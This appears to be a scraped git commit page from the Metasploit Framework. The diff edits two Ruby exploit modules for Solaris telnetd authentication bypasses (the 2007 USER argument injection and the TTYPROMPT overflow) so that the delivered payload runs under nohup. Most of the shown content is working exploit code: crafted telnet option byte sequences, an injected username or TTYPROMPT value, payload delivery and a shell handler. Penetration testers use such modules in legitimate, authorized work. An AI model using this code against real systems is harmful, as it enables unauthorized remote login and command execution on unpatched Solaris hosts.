Use nohup to prevent the telnet session close from killing the command
git-svn-id: file:///home/svn/framework3/trunk@8082 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
8399ff46b2
commit
b1f79c6342
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits the argument injection vulnerabilty
|
||||
|
|
@ -48,13 +48,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 12 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
|
|
@ -64,27 +64,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
print_status('Setting USER environment variable...')
|
||||
|
||||
|
||||
req = "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"
|
||||
req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF"
|
||||
req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"
|
||||
|
||||
req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
||||
|
||||
req << "\xFF\xFC\x25"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
||||
req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"
|
||||
|
||||
req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
||||
req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"
|
||||
req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
|
|
@ -99,13 +99,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0"
|
||||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
sock.get_once
|
||||
sleep(0.25)
|
||||
|
||||
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
|
||||
|
||||
sleep(0.25)
|
||||
|
||||
sock.put(payload.encoded + "\n")
|
||||
sleep(0.25)
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
|
@ -19,11 +19,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module uses a buffer overflow in the Solaris 'login'
|
||||
application to bypass authentication in the telnet daemon.
|
||||
application to bypass authentication in the telnet daemon.
|
||||
},
|
||||
'Author' => [ 'MC', 'cazz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
@ -49,13 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 18 2002',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
|
|
@ -65,12 +65,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
banner = sock.get_once
|
||||
|
||||
|
||||
print_status('Setting TTYPROMPT...')
|
||||
|
||||
req =
|
||||
|
||||
req =
|
||||
"\xff\xfc\x18" +
|
||||
"\xff\xfc\x1f" +
|
||||
"\xff\xfc\x21" +
|
||||
|
|
@ -81,29 +81,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\xff\xfb\x00" +
|
||||
"\xff\xfa\x27\x00" +
|
||||
"\x00TTYPROMPT" +
|
||||
"\x01" +
|
||||
rand_text_alphanumeric(6) +
|
||||
"\xff\xf0"
|
||||
|
||||
"\x01" +
|
||||
rand_text_alphanumeric(6) +
|
||||
"\xff\xf0"
|
||||
|
||||
sock.put(req)
|
||||
sleep(0.25)
|
||||
|
||||
|
||||
print_status('Sending username...')
|
||||
|
||||
|
||||
filler = rand_text_alpha(rand(10) + 1)
|
||||
|
||||
req << datastore['USER'] + (" #{filler}" * 65)
|
||||
|
||||
|
||||
req << datastore['USER'] + (" #{filler}" * 65)
|
||||
|
||||
sock.put(req + "\n\n\n")
|
||||
|
||||
sleep(0.25)
|
||||
sock.get_once
|
||||
|
||||
sock.put(payload.encoded + "\n")
|
||||
|
||||
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
|
||||
|
||||
sleep(0.25)
|
||||
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue